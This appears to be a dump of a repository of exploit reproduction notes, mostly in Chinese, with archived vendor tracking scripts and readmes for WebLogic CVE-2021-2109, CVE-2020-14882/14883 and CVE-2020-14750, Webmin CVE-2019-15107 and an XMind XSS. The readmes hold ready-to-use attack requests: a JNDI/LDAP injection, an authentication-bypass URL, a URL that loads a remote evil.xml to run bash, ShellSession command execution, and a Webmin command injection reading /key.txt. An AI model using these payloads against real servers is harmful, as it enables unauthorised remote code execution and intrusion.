Marketo marketing automation web activity tracking script 5 | * Version: prod r874 6 | */ 7 | (function(b){if(!b.Munchkin){var c=b.document,e=[],k,l={fallback:"161"},g=[],m=function(){if(!k){for(;0 3 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/twitterv2.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/utag.364.js.下载: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/utag.364.js.下载 -------------------------------------------------------------------------------- /VMWare/VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】/版本比对表备份/Build numbers and versions of VMware ESXi_ESX (2143832)_files/utag.439.js.下载: -------------------------------------------------------------------------------- 1 | //tealium universal tag - utag.439 ut4.0.202007150633, Copyright 2020 Tealium.com Inc. All Rights Reserved. 2 | try{(function(id,loader){var u={};utag.o[loader].sender[id]=u;if(utag===undefined){utag={};}if(utag.ut===undefined){utag.ut={};}if(utag.ut.loader===undefined){u.loader=function(o){var a,b,c,l;a=document;if(o.type==="iframe"){b=a.createElement("iframe");b.setAttribute("height","1");b.setAttribute("width","1");b.setAttribute("style","display:none");b.setAttribute("src",o.src);}else if(o.type==="img"){utag.DB("Attach img: "+o.src);b=new Image();b.src=o.src;return;}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";b.src=o.src;}if(o.id){b.id=o.id;}if(typeof o.cb==="function"){if(b.addEventListener){b.addEventListener("load",function(){o.cb();},false);}else{b.onreadystatechange=function(){if(this.readyState==="complete"||this.readyState==="loaded"){this.onreadystatechange=null;o.cb();}};}}l=o.loc||"head";c=a.getElementsByTagName(l)[0];if(c){utag.DB("Attach to "+l+": "+o.src);if(l==="script"){c.parentNode.insertBefore(b,c);}else{c.appendChild(b);}}};}else{u.loader=utag.ut.loader;} 3 | u.ev={"view":1};u.map={};u.extend=[];u.send=function(a,b){if(u.ev[a]||u.ev.all!==undefined){var c,d,e,f;u.data={"account_id":"4c2baaa51a9429b06ce4697848a7ef01","base_url":"//hm.baidu.com/hm.js?"};for(d in utag.loader.GV(u.map)){if(b[d]!==undefined&&b[d]!==""){e=u.map[d].split(",");for(f=0;f0){u.map_func(arr,obj[i],item);}else{obj[i]=item;}};u.map={};u.extend=[];u.send=function(a,b){if(u.ev[a]||u.ev.all!==undefined){utag.DB("send:440");utag.DB(b);var c,d,e,f;u.data={"fs_debug":"false","fs_host":"fullstory.com","fs_org":"B6BPJ","fs_namespace":"FS","uid":"","uservars":{},"get_fs_session_id":"true","get_tealium_session_id":"true","get_tealium_visitor_id":"true"};utag.DB("send:440:EXTENSIONS");utag.DB(b);for(d in utag.loader.GV(u.map)){if(b[d]!==undefined&&b[d]!==""){e=u.map[d].split(",");for(f=0;f 2 | 3 | 4 | -------------------------------------------------------------------------------- /Weblogic/WebLogic后台命令执行漏洞(CVE-2021-2109)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Weblogic/WebLogic后台命令执行漏洞(CVE-2021-2109)/0.png -------------------------------------------------------------------------------- /Weblogic/WebLogic后台命令执行漏洞(CVE-2021-2109)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Oracle WebLogic:一款流行的JAVA应用服务器 3 | 4 | # 0x01 复现环境 5 | 复现环境:本地搭建的环境(win10 1909) 6 | 复现版本:WebLogic v12.2.1.4.0 7 | 环境搭建: 8 | 参考[https://mp.weixin.qq.com/s/NL9o7MVG8j8zikeGUfTsVA](https://mp.weixin.qq.com/s/NL9o7MVG8j8zikeGUfTsVA)中的环境搭建部分 9 | 10 | # 0x02 利用条件 11 | 需要登陆WebLogic控制台 12 | 13 | # 0x03 影响版本 14 | 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 15 | 16 | # 0x04 漏洞复现 17 | 攻击环境:kali x64 18 | 下载JNDIExploit:https://github.com/feihong-cs/JNDIExploit/releases/download/v.1.11/JNDIExploit.v1.11.zip 19 | 启动JNDIExploit: 20 | ``` 21 | java -jar ./JNDIExploit-v1.11.jar -i 192.168.1.5#其中192.168.1.5为本机IP 22 | ``` 23 | 登录WebLogic控制台 24 | 刷新WebLogic控制台,burp抓包,替换为如下payload 25 | ``` 26 | POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;5:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1 27 | Host: 192.168.1.7:7001 28 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 29 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 30 | Accept-Language: en-US,en;q=0.5 31 | Accept-Encoding: gzip, deflate 32 | cmd:whoami 33 | Referer: http://192.168.1.7:7001/console/login/LoginForm.jsp 34 | Connection: close 35 | Cookie: ADMINCONSOLESESSION=-XjUGJChfEBvqXqZBo748vnBGr895IIDGF5cmnoR9HkR_uY8Hrfd!-1181708775 36 | Upgrade-Insecure-Requests: 1 37 | Pragma: no-cache 38 | Cache-Control: no-cache 39 | ``` 40 | 如下图,可以看到成功执行命令whoami 41 | ![image](./0.png) 42 | 43 | 此漏洞可配合Weblogic未授权访问漏洞(CVE-2020-14882)使用 44 | 45 | # 0x05 批量脚本 46 | 无 47 | 48 | # 0x06 参考链接 49 | https://www.o2oxy.cn/3019.html 50 | -------------------------------------------------------------------------------- /Weblogic/Weblogic前台验证绕过+后台命令执行漏洞复现(CVE-2020-14882、CVE-2020-14883)/readme.md: -------------------------------------------------------------------------------- 1 | 访问以下URL,即可未授权访问到管理后台页面 2 | ``` 3 | http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal 4 | ``` 5 | 6 | POC Weblogic 10 7 | ``` 8 | 9 | 12 | 13 | 14 | 15 | bash 16 | -c 17 | 18 | 19 | 20 | 21 | 22 | ``` 23 | ``` 24 | http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.56.1:8000/evil.xml") 25 | ``` 26 | 27 | POC Weblogc 12 28 | ``` 29 | http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); 30 | 31 | http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');") 32 | ``` 33 | Weblogic 10 没有com.tangosol.coherence.mvel2.sh.ShellSession这个gadget,只存在于weblogic 12,weblogic10 并没有这个包,所以无法使用 34 | 35 | # 参考链接 36 | https://atsud0.me/2020/10/30/CVE-2020-14882%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/ -------------------------------------------------------------------------------- /Weblogic/Weblogic前台验证绕过漏洞复现(CVE-2020-14750)/readme.md: -------------------------------------------------------------------------------- 1 | ``` 2 | http://127.0.0.1:7001/console/images/%252E./console.portal 3 | ``` 4 | 5 | # 参考链接 6 | https://www.icode9.com/content-4-1115139.html -------------------------------------------------------------------------------- /Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/0.png -------------------------------------------------------------------------------- /Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/1.png -------------------------------------------------------------------------------- /Webmin/Webmin远程命令执行漏洞(CVE-2019-15107)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/d01lL2RSbGEwZUNTeThVZ0xDdXl0Zz09bW96aGUmozhe 3 | 复现版本:Webmin1.910 4 | 5 | # 0x01 利用条件 6 | 需要开启密码重置功能,如下图 7 | ![image](./0.png) 8 | 查看webmin的配置文件/etc/webmin/miniserv.conf,可以发现passwd_mode的值已经从0变为了2 9 | 10 | # 0x02 影响版本 11 | Webmin<=1.920 12 | 13 | # 0x03 漏洞复现 14 | 随便发起一个请求,burp拦截,修改为如下数据包 15 | ``` 16 | POST /password_change.cgi HTTP/1.1 17 | Host: 219.153.49.228:41489 18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01 19 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 20 | Accept-Encoding: gzip, deflate 21 | Referer: http://219.153.49.228:41489/passwd/index.cgi?xnavigation=1 22 | X-PJAX: true 23 | X-PJAX-Container: [data-dcontainer] 24 | X-PJAX-URL: passwd/edit_passwd.cgi?user=root 25 | X-Requested-From: passwd 26 | X-Requested-From-Tab: webmin 27 | X-Requested-With: XMLHttpRequest 28 | Content-Type: text/plain;charset=UTF-8 29 | Content-Length: 60 30 | Connection: close 31 | 32 | user=yibudengtian&old=cat /key.txt&new1=123456&new2=123456 33 | ``` 34 | 35 | # 0x04 踩坑记录 36 | 坑1: 37 | ![image](./1.png) 38 | 39 | # 参考链接 40 | https://xz.aliyun.com/t/6040 41 | https://www.cnblogs.com/paperpen/p/11442532.html 42 | -------------------------------------------------------------------------------- /XMind/XMind 2020 XSS漏洞(暂无编号)/pic/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/XMind/XMind 2020 XSS漏洞(暂无编号)/pic/a0.png -------------------------------------------------------------------------------- /XMind/XMind 2020 XSS漏洞(暂无编号)/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /XMind/XMind 2020 XSS漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | 公众号“洛米唯熊”上看到的,参考链接:https://mp.weixin.qq.com/s/yImhOCX3Xy91XaHtFFUnng 2 | 3 | 首先声明:只复现出了XSS漏洞,没复现出命令执行漏洞 4 | 5 | 从![官网](https://www.xmind.cn/xmind2020/)下载最新版(截止到2021/05/10 15:30),并安装 6 | 7 | 打开XMind,随便选择一个模板,此处选择SnowBrush,选择大纲模式,将“中心主题”替换为如下代码 8 | ``` 9 |